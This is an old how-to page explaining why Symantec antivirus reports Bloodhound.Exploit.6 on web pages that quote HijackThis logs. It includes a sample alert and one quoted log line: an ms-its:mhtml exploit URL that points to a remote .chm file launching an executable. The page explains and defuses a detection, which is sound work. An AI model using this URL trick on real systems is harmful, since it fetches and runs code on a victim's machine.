Bloodhound.Exploit.6 False Positive found by Antivirus in Forums and Hijack Logs

Contributor Icon Contributed by davak Date Icon December 7, 2004  
Tag Icon Tagged: Windows spyware

Symantec antivirus will have a common false positive if a web page contains particular text. This text is common in hijack this logs. This recipe explains and duplicates this positive positive.


If you are running Symantec antivirus, this page may give you a false positive. If you post a comment, it will very likely give you a false positive. Don’t worry. You are safe. Keep reading for the explanation.

In fact, it’ll probably say something like this:

Scan type: Realtime Protection Scan
Event: Virus Found!
Virus name: Bloodhound.Exploit.6
File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D14Q0F5Z\admin[1].htm
Location: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D14Q0F5Z
Computer: 5XBBT01
User: Administrator
Action taken: Clean failed : Quarantine failed : Access denied
Date found: Tuesday, December 07, 2004 11:18:39 AM

This scanner is picking up this text and giving a false positive:

O16 - DPF: {10003000-1000-0000-1000-000000000000} - ms-its:mhtml:file://c:\nosuch.mht!http://2awm.com/pop/chm/sextxsp.chm::/on-line. exe

This is text that is often seen in Bloodhound.Exploit.6 infections. The confusion occurs when text like this is posted in forums in trying to clean out infections on other systems.

This is very commonly seen in forums where infected hijack this logs are posted.

This is a false positive. You system is not infected.

Previous recipe | Next recipe |
 

 
close Reblog this comment
Powered by Disqus · Learn more
blog comments powered by Disqus